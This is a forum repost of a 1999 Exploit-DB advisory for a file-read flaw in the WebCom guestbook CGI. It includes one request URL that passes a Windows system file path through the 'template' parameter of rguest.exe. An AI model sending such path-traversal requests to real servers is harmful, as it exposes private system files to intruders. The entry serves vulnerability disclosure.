Exploit WebCom datakommunikation Guestbook 0.1 - 'rguest.exe' Arbitrary File Access

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
20447
Проверка EDB
  1. Пройдено
Автор
MNEMONIX
Тип уязвимости
REMOTE
Платформа
CGI
CVE
cve-1999-0467 cve-1999-0287
Дата публикации
1999-04-09
Код:
source: https://www.securityfocus.com/bid/2024/info
 
The freeware guestbook package from freeware.webcom.se provides a web-based guestbook feature, using CGI. Some versions of this guestbook (undetermined at the time of writing) are vulnerable to an attack allowing an intruder to retrieve the contents of arbitrary files to which the web server has access. This can be accomplished by specifying the path and filename as the parameter "template" to either rguest.exe or wguest.exe - see Exploit for example. These two programs typically reside in /cgi-bin.

http://server/cgi-bin/rguest.exe?template=c:\winnt\system32\$winnt$.inf will return the $winnt$.inf file
 
Источник
www.exploit-db.com

Похожие темы